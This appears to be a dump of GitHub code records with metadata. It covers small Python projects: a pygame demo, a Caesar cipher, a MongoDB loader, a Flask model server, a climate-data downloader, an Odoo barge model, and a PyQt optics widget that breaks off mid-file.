"agunny/Price-Query", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 5033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "google.oauth2.service_account.Credentials.from_service_account_file", "line_number": 11, "usage_type": "call"}, {"api_name": "google.oauth2.service_account.Credentials", "line_number": 11, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "18914168784", "text": "from time import sleep\nimport pygame\nimport random\n\npygame.init()\n\nscreen = pygame.display.set_mode([500, 500])\nrunning = True\n\nred = (180, 50, 50)\nsize = (0, 0, 250, 200)\n\n\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n screen.fill((255, 255, 255))\n x = random.randint(180, 440)\n y = random.randint(180, 440)\n pygame.draw.circle(screen, (100, 180, 155), (x, y), 25)\n\n pygame.draw.ellipse(screen, red, size)\n\n pygame.display.flip()\n\npygame.quit()\n", "repo_name": "Jap8nted/aprendiendo_git", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 16, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 20, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.draw.ellipse", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "15524201105", "text": "\nfrom art import logo\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef welcome():\n print(f'{logo}')\n print(f'\\n\\n{\"*\" * 100}\\n\\n')\n\ndef cipher():\n cifrando = True\n while cifrando:\n tarea = input(\"Escribe 'encode' para encriptar, excribe 'decode' para desencriptar: \").lower().strip()\n try:\n saltos = int(input(f'Escribe el numero de saltos para la criptografía: '))\n saltos = saltos % 26\n except ValueError:\n print(\"\\n\\nXX - Intenta de nuevo con un número - XX\\n\\n\")\n cipher()\n texto_crudo = input(f'Escribe el texto a encriptar: ').lower()\n\n if tarea == 'decode':\n saltos *= -1\n texto_final = ''\n for letra in texto_crudo:\n if letra not in alphabet:\n texto_final += letra\n continue\n indice = alphabet.index(letra)\n texto_final += (alphabet[indice + saltos])\n print(f'\\n\\nEl texto {tarea} es: {texto_final}\\n\\n')\n\n resp = input(f'¿Quieres seguir cifrando/descifrando texto? (si / no): ')\n if resp == 'no':\n cifrando = False\n\nif __name__ == '__main__':\n welcome()\n cipher()", "repo_name": "ODCenteno/python_100days", "sub_path": "Day_8_functions_cesar/caesar_cipher2.py", "file_name": "caesar_cipher2.py", "file_ext": "py", "file_size_in_byte": 1421, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "art.logo", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "27506424219", "text": "import json\nfrom math import sin, cos, sqrt, atan2, radians\n\n# Read file\nwith open(\"stores-geo.json\") as json_file:\n # Load the file resource with json\n stores = json.load(json_file)\n\n\ndef points_distance(lat1, lng1, lat2, lng2):\n R = 6373.0\n\n lat1 = radians(lat1)\n lng1 = radians(lng1)\n\n lat2 = radians(lat2)\n lng2 = radians(lng2)\n\n dlon = lng2 - lng1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance = R * c\n\n return distance\n\n\nradius_lat = 52.002562\nradius_lng = 0.724652\nradius_distance = 100\n\nfor row in stores:\n point_distance = points_distance(radius_lat, radius_lng, row[\"lat\"], row[\"lng\"])\n if radius_distance >= point_distance:\n print(\"distance for : \" + row[\"postcode\"] + \"is \" + str(point_distance))\n", "repo_name": "agavazov/python-postcodes", "sub_path": "draft/5-radius-search.py", "file_name": "5-radius-search.py", "file_ext": "py", "file_size_in_byte": 853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 13, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 14, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 16, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 17, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 22, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 23, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "5253436703", "text": "import json \nimport pymongo\nfrom pymongo import MongoClient\nimport os\nfrom config import client\n\n\n# Select the database\ndb = client.messier_registry\n# Select the collection\ncatalog = db[\"catalog\"]\nurl = \"http://messier.obspm.fr/\"\n\n\nclass PushObjectsToDB:\n \"\"\"This class push all objects in the db \"\"\"\n\n\n def __init__(self):\n self.get_objects()\n\n\n def get_objects(self):\n \"\"\"\n FUNCTION THAT GET MESSIER OBJECT\n \n Parameters\n ----------\n None\n\n Loop in each element in catalogue-de-messier.json and add to Database\n\n Returns\n -------\n None\n\n \"\"\"\n with open('./datas/catalogue-de-messier.json') as json_file:\n datas = json.load(json_file)\n for obj in datas:\n current_object = obj['fields']\n catalog.insert(current_object)", "repo_name": "wdelenclos/messier-registry", "sub_path": "datas/push_objects.py", "file_name": "push_objects.py", "file_ext": "py", "file_size_in_byte": 871, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "config.client.messier_registry", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.client", "line_number": 9, "usage_type": "name"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "16307171429", "text": "from transformers import AutoTokenizer, AutoModelForCausalLM\nimport transformers, torch\nfrom flask import Flask, jsonify, request\n\nmodel = \"tiiuae/falcon-7b-instruct\"\n\nprint(\"Loading pipeline...\")\ntokenizer = AutoTokenizer.from_pretrained(model)\npipeline = transformers.pipeline(\n \"text-generation\",\n model=model,\n tokenizer=tokenizer,\n torch_dtype=torch.bfloat16,\n trust_remote_code=True,\n device_map=\"auto\",\n )\nprint(\"Pipeline loaded\")\n\nparameters = {\n 'max_length':1500,\n 'do_sample':True,\n 'top_k':10,\n 'num_return_sequences':1,\n 'eos_token_id': tokenizer.eos_token_id,\n}\n\napp = Flask(__name__)\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n data = request.get_json()\n prompt = data['inputs']\n try:\n params = data['parameters']\n parameters.update((k, v) for k, v in params.items() if k in parameters)\n parameters['eos_token_id'] = tokenizer.eos_token_id\n except:\n pass\n try:\n sequences = pipeline(prompt, **parameters)\n return jsonify({\"result\": sequences})\n except Exception as e:\n return jsonify({\"result\": e})\n\nif __name__ == \"__main__\":\n app.run()", "repo_name": "SaturdaysAI/falcon-server", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1172, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 8, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 8, "usage_type": "name"}, {"api_name": "transformers.pipeline", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.bfloat16", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "13455878846", "text": "from django.db import models\nfrom django.utils.translation import gettext as _\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.contrib.auth.models import User\n\nfrom core.models import BaseModel\nfrom wannablab.models import Language\n\n\nclass Profile(BaseModel):\n user = models.OneToOneField(\n User,\n verbose_name=_('User'),\n on_delete=models.CASCADE\n )\n\n image = models.ImageField(\n default='default.jpg',\n verbose_name=_('Image'),\n upload_to='profile_pics'\n )\n\n birth_date = models.DateField(\n null=True,\n verbose_name=_('Date of birth'),\n blank=True\n )\n\n info = models.TextField(\n verbose_name=_('Info about user')\n )\n\n city = models.CharField(\n max_length=50,\n verbose_name=_('City')\n )\n\n rating = models.IntegerField(\n default=5,\n validators=[MinValueValidator(0), MaxValueValidator(5)],\n verbose_name=_('Rating')\n )\n\n language = models.ForeignKey(\n to=Language,\n related_name='user_language',\n on_delete=models.SET_NULL,\n null=True\n )\n\n def __str__(self):\n return f'{self.user.username} profile'\n\n class Meta:\n db_table = 'profile'\n verbose_name = _('Profile')\n verbose_name_plural = _('Profiles')\n\n\n\n", "repo_name": "valeriiamykhalova/wannablab", "sub_path": "src/users/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1349, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "core.models.BaseModel", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.DateField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.core.validators.MinValueValidator", "line_number": 40, "usage_type": "call"}, {"api_name": "django.core.validators.MaxValueValidator", "line_number": 40, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "wannablab.models.Language", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "70783201446", "text": "\"\"\"\nThis script downloads temperature measurements from http://berkeleyearth.org\n(country mean) for all available countries listed in \"countries.txt\" plus the\ndata for Hawaii.\n\nIt uses the library \"requests\" to perform HTTP GET requests to the server and\nget the respective data file. We have to do some clever manipulations because\nthe data files are encoded using Latin1 instead of Unicode. And life is so much\nnicer when everything is Unicode.\n\nAll data files are placed in the \"data\" folder.\n\"\"\"\nimport os\nimport requests\n\n# If the 'data' folder doesn't exist, create it.\nif not os.path.exists('data'):\n os.mkdir('data')\n print('Create \"data\" folder.')\nelse:\n print('Using existing \"data\" folder.')\n print('WARNING: Will overwrite any files in there!')\n# Empty 'print' will print an empty line.\nprint()\n\n# Load the list of countries\n# Use the 'open' function to open a file for reading. The file content is\n# accessed using the 'country_file' variable.\nwith open('countries.txt') as country_file:\n # We need to read in the country names, filter out empty strings from the\n # country list, and strip trailing white space and line breaks.\n # We'll start with an empty list and fill it with the names from our open\n # file.\n countries = []\n # Using an open file object in a 'for' loop will iterate over the lines of\n # that file, one at a time, until the end of the file.\n for line in country_file:\n # Remove trailing spaces and newlines.\n stripped = line.strip()\n # Check if the line is not an empty string after removing trailing\n # spaces and newlines.\n if stripped:\n # Add to the country list\n countries.append(stripped)\n # As a bonus, the above code could be substituted by a single line using\n # Pythons coolest feature: list comprehensions.\n # countries = [line.strip() for line in country_file if line.strip()]\n\n# We'll be sneaky (lazy?) and add Hawaii to our list of countries to download\n# the data from there as well.\ncountries.append('Hawaii')\n\nbaseurl = 'http://berkeleyearth.lbl.gov/auto/Regional/TAVG/Text/'\n\n# We will collect the names of any country that we fail to download.\nfailed = []\n\nprint(\"Downloading data files:\")\n\n# The 'enumerate' function will produce an index number along with the list\n# elements in a 'for' loop. It's very handy.\nfor country_number, country in enumerate(countries):\n # Print the number of the current country and its name. We add 1 because\n # enumerate starts from 0.\n print(' {}. {}... '.format(country_number + 1, country), end='')\n # Convert to lower case (lower) and use '-' instead of white space in case\n # of composite names.\n country_no_spaces = country.lower().replace(' ', '-')\n # The country names are Unicode strings (with some special characters, like\n # in \"Åland\"). To get those characters into URLs, we must encode them using\n # a specific notation (e.g., '%20' instead of ' '). We can do that using\n # requests. Another detail is that the file names on the server are\n # actually encoded using latin1 instead of Unicode :(\n country_quoted = requests.utils.quote(country_no_spaces, encoding='latin1')\n file_name = country_quoted + '-TAVG-Trend.txt'\n url = baseurl + file_name\n # Now that we have a URL, we can make a GET request to get back our data\n # file.\n request = requests.get(url)\n # The status code tells us if the request was successful (200).\n if request.status_code != 200:\n failed.append(country)\n print('FAILED')\n else:\n # Save the downloaded text to a file in the \"data\" folder.\n # We can use the 'os' module to operate on paths in a\n # platform-independent way.\n # We need to open the file with write permission ('w')\n with open(os.path.join('data', file_name), 'w') as output_file:\n # Once again, text encoding is an issue. The data file is encoded\n # using latin1 instead of unicode (which is what Python likes), so\n # special characters will break when we read in the data.\n # Luckily, it's easy to convert the data file to unicode using the\n # 'decode' method.\n output_file.write(request.content.decode('latin1'))\n print('Success')\n\n# An empty list will evaluate to False in an 'if' statement, so we can easily\n# check if any of our downloads failed.\nif failed:\n print(\"\\nFailed to download data from the following countries:\")\n for country in failed:\n print(country)\nelse:\n print('\\nDone')\n", "repo_name": "leouieda/python-hawaii-2017", "sub_path": "download_data.py", "file_name": "download_data.py", "file_ext": "py", "file_size_in_byte": 4580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.utils.quote", "line_number": 74, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 74, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "19566184440", "text": "import argparse\r\nimport os \r\nfrom collections import ChainMap\r\n\r\nasync def sum():\r\n # default values of first and second number\r\n deff = {'first': 0, 'second': 0}\r\n\r\n # adding argument parser\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-x', '--first', type=int)\r\n parser.add_argument('-y', '--second', type=int)\r\n \r\n # parssing the arguments\r\n arg = parser.parse_args()\r\n \r\n # making a dictionary from the arg\r\n cla = {key:value for key, value in vars(arg).items() if value} # vars(args) is equal to arg.__dict\r\n \r\n # create a ChainMap\r\n chain = ChainMap(cla,os.environ, deff)\r\n print(chain['first'] + chain['second'])\r\n\r\nif __name__ == \"__main__\":\r\n sum()\r\n", "repo_name": "data-pirate/collections-module-in-python", "sub_path": "ChainMap.py", "file_name": "ChainMap.py", "file_ext": "py", "file_size_in_byte": 725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.ChainMap", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "6813168732", "text": " # -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\nimport time\nfrom odoo.exceptions import UserError, ValidationError\nimport odoo.addons.decimal_precision as dp\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass Barge(models.Model):\n\t_name = \"shipping.barge\"\n\n\tname = fields.Char(string=\"Name\", size=100 , required=True)\n\tcapacity = fields.Float( string=\"Capacity (WMT)\", required=True, default=0, digits=dp.get_precision('Barge') )\n\t# shipping_ids = fields.One2many(\"shipping.shipping\", inverse_name=\"barge_id\", string=\"Shippings\", readonly=True)\n\twarehouse_id = fields.Many2one(\n 'stock.warehouse', 'Warehouse',\n\t\t\trequired=True,\n ondelete=\"restrict\")\n\tlocation_id = fields.Many2one(\n 'stock.location', 'Location',\n\t\t\tdomain=[ ('usage','=',\"internal\") ],\n ondelete=\"restrict\")\n\tprocurement_rule_id = fields.Many2one(\n 'procurement.rule', 'Procurement Rule',\n\t\t\treadonly=True,\n ondelete=\"restrict\")\n\tactive = fields.Boolean(\n 'Active', default=True,\n help=\"If unchecked, it will allow you to hide the rule without removing it.\")\n\n\t@api.model\n\tdef create(self, values):\n\t\tStockLocation = self.env['stock.location'].sudo()\n\t\tProcurementRule = self.env['procurement.rule'].sudo()\n\t\tStockPickingType = self.env['stock.picking.type'].sudo()\n\t\tStockWarehouse = self.env['stock.warehouse'].sudo()\n\n\t\twarehouse = StockWarehouse.search([ (\"id\", '=', values[\"warehouse_id\"] ) ])\n\t\tpicking_type = StockPickingType.search([ (\"code\", '=', \"outgoing\" ), (\"warehouse_id\", '=', values[\"warehouse_id\"] ) ])\n\t\tif not picking_type:\n\t\t\traise UserError(_(\"Cannot Find Picking Type For Procurement Rule \") )\n\t\t\n\t\tif not values[\"location_id\"] : \n\t\t\tvalues[\"location_id\"] = StockLocation.create({\n\t\t\t\t\t\t\t\t\"name\" : values[\"name\"],\n\t\t\t\t\t\t\t\t\"usage\" : \"internal\",\n\t\t\t\t\t\t\t\t\"location_id\" : warehouse.view_location_id.id ,\n\t\t\t\t\t\t\t}).id\n\n\t\tvalues[\"procurement_rule_id\"] = ProcurementRule.create({\n\t\t\t\t\t\t\t\"name\" : values[\"name\"] + \"-> Customer\",\n\t\t\t\t\t\t\t\"action\" : \"move\",\n\t\t\t\t\t\t\t\"location_src_id\" : values[\"location_id\"] ,\n\t\t\t\t\t\t\t\"warehouse_id\" : values[\"warehouse_id\"] ,\n\t\t\t\t\t\t\t# \"location_id\" : self.env['ir.property'].get_param('property_stock_customer', '').split(',') ,\n\t\t\t\t\t\t\t\"picking_type_id\" : picking_type.id ,\n\t\t\t\t\t\t}).id\n\t\tres = super(Barge, self ).create(values)\n\t\treturn res\n\t\n\t@api.multi\n\tdef unlink(self):\n\t\traise UserError(_(\"Cannot Delete Data, Please Archive It \") )\n\t\t# for rec in self:\n\t\t# \tif rec.location_id:\n\t\t# \t\trec.location_id.toggle_active()\n\t\t# \tif rec.procurement_rule_id:\n\t\t# \t\trec.procurement_rule_id.toggle_active()\n\t\t\n\t\t# return super(Barge, self ).unlink()\n\t\t\n\n", "repo_name": "madukubah/barge", "sub_path": "models/barge.py", "file_name": "barge.py", "file_ext": "py", "file_size_in_byte": 2667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "odoo.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "odoo.fields.Char", "line_number": 12, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 12, "usage_type": "name"}, {"api_name": "odoo.fields.Float", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 13, "usage_type": "name"}, {"api_name": "odoo.addons.decimal_precision.get_precision", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.addons.decimal_precision", "line_number": 13, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 15, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 15, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 19, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 19, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 23, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 23, "usage_type": "name"}, {"api_name": "odoo.fields.Boolean", "line_number": 27, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 27, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 31, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 31, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 63, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 63, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 61, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "1271526541", "text": "from flask import Flask, request, Response, redirect, render_template, session, url_for\n\nimport time\n\nnum_reg = 0\n\napp = Flask(__name__)\n\n# obteniendo el post resquest\n@app.route('/api', methods=['POST'])\ndef api_response():\n #antes guarda el valor de cuando comenzo a correr el while\n antes = time.perf_counter()\n\n\n if request.method == 'POST':\n #despues es el valor del tiempo despues de recibir respuesta\n despues = time.perf_counter()\n\n # Actualizando el registro\n num_reg += 1\n\n #calculando el tiempo para saver cuanto tiempo paso\n t_sensor1 = despues - antes\n print()\n print(\"Tiempo %\",t_sensor1)\n print(\"Numero de registro %\" ,num_reg)\n\n # Output comparison\n return \"ok\"\n\n@app.route(\"/\")\ndef index():\n\n return render_template(\"index.html\")", "repo_name": "Jcgo3003/Metro", "sub_path": "Versiones/Antiguos/met/application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 827, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "13301239000", "text": "# -*- coding: utf-8 -*-\n\nfrom b3j0f.utils.ut import UTCase\nfrom mock import MagicMock, patch\nfrom unittest import main\n\nfrom link.parallel.drivers.ipython import IPythonDriver\n\n\nclass TestIPythonDriver(UTCase):\n def setUp(self):\n patcher = patch('link.parallel.drivers.ipython.Client')\n self.client = patcher.start()\n self.addCleanup(patcher.stop)\n\n self.client.__getitem__ = MagicMock(return_value=MagicMock())\n\n self.drv = IPythonDriver()\n self.drv._view = MagicMock()\n\n self.callback = lambda doc: doc\n self.expected = [1, 2, 3, 4]\n\n self.drv._view.map_sync = MagicMock(return_value=self.expected)\n\n def test_map(self):\n result = list(self.drv.map(self.callback, self.expected))\n\n self.drv._view.map_sync.assert_called_with(\n self.callback,\n self.expected\n )\n self.assertEqual(result, self.expected)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "linkdd/link.parallel", "sub_path": "link/parallel/drivers/test/ipython.py", "file_name": "ipython.py", "file_ext": "py", "file_size_in_byte": 962, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "b3j0f.utils.ut.UTCase", "line_number": 10, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 16, "usage_type": "call"}, {"api_name": "link.parallel.drivers.ipython.IPythonDriver", "line_number": 18, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 19, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 24, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "27721209784", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 09:34:33 2022\n\n@author: joao.astolfo\n\"\"\"\nimport Shadow\nimport sys\n\nimport inspect\n\nfrom PyQt5 import QtGui, QtWidgets\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtCore import QRect, Qt\nfrom PyQt5.QtWidgets import (QApplication, QFileDialog, QGridLayout, QLabel, QPushButton,\n QCheckBox, QTextEdit, QVBoxLayout, QHBoxLayout, QWidget, QLineEdit,\n QTabWidget, QScrollArea, QGroupBox, QComboBox)\nfrom Shadow import ShadowTools as ST\nfrom orangewidget import gui\nfrom oasys.widgets import gui as oasysgui, widget\nfrom oasys.util.oasys_util import EmittingStream\n\nfrom orangecontrib.shadow.util.python_script import PythonConsole\nfrom orangecontrib.shadow.util.shadow_objects import ShadowBeam, ShadowCompoundOpticalElement\nfrom orangecontrib.shadow.util.shadow_util import ShadowCongruence\n\nfrom orangecontrib.shadow.lnls.widgets.utility.info import classes, funcs\n\nfrom Shadow.ShadowLibExtensions import CompoundOE\n\nimport numpy\nimport Shadow\nimport inspect\n\nclass HybridInfo(widget.OWWidget):\n\n name = \"WIP Hybrid Info\"\n description = \"Hybrid Info. !!! WIP !!!\"\n icon = \"icons/info.png\"\n maintainer = \"João Pedro Imbriani Astolfo\"\n maintainer_email = \"joao.astolfo(@at@)lnls.br\"\n priority = 4\n category = \"Info Tools\"\n keywords = [\"data\", \"file\", \"load\", \"read\"]\n \n want_basic_layout = False\n\n inputs = [(\"Input Beam\", ShadowBeam, \"setBeam\")]\n\n WIDGET_WIDTH = 950\n WIDGET_HEIGHT = 650\n\n want_main_area = 1\n want_control_area = 0\n\n input_beam = None\n\n\n def __init__(self, show_automatic_box=True):\n super().__init__()\n \n self.initializeUI()\n \n \n def initializeUI(self):\n geom = QApplication.desktop().availableGeometry()\n \n window_width = round(min(geom.width()*0.98, self.WIDGET_WIDTH))\n window_height = round(min(geom.height() * 0.95, self.WIDGET_HEIGHT))\n \n self.setGeometry(QRect(round(geom.width()*0.05),\n round(geom.height()*0.05),\n window_width,\n window_height))\n \n self.setWindowTitle('Hybrid Info')\n self.setupWidgets()\n \n self.show()\n \n \n def setupWidgets(self):\n \n main_grid = QGridLayout()\n \n # Create section labels\n self.setup_label = QLabel('Setup')\n self.setup_label.setFont(QFont('Arial', 12))\n self.setup_label.setAlignment(Qt.AlignCenter)\n scr_label = QLabel('Python Script')\n scr_label.setFont(QFont('Arial', 12))\n scr_label.setAlignment(Qt.AlignLeft)\n \n# =============================================================================\n# Create setup section\n# =============================================================================\n setup_v_box = QVBoxLayout()\n setup_v_box.setContentsMargins(0,0,0,0)#5, 5, 5, 5)\n \n setup_v_box.addWidget(self.setup_label)\n \n self.vbox = QVBoxLayout()\n self.wi = QGroupBox()\n self.wi.setLayout(self.vbox)\n self.scroll = QScrollArea()\n \n self.scroll.setWidget(self.wi)\n self.scroll.setWidgetResizable(True)\n self.scroll.setFixedHeight(self.WIDGET_HEIGHT*0.75)\n self.scroll.setFixedWidth(self.WIDGET_WIDTH*0.25)\n setup_v_box.addWidget(self.scroll)\n \n # Create buttons\n # TODO: dinamically adjust groupbox height to fill blank spaces\n # Idea: Grid inside another grid\n update_button = QPushButton('Update')\n execute_button = QPushButton('Run Script')\n self.save_button = QPushButton('Save Script to File')\n update_button.clicked.connect(self.update_script)\n execute_button.clicked.connect(self.execute_script)\n self.save_button.clicked.connect(self.save_script)\n \n # Create hybrid checkboxes\n setup_v_box.addWidget(update_button)\n setup_v_box.addWidget(execute_button)\n 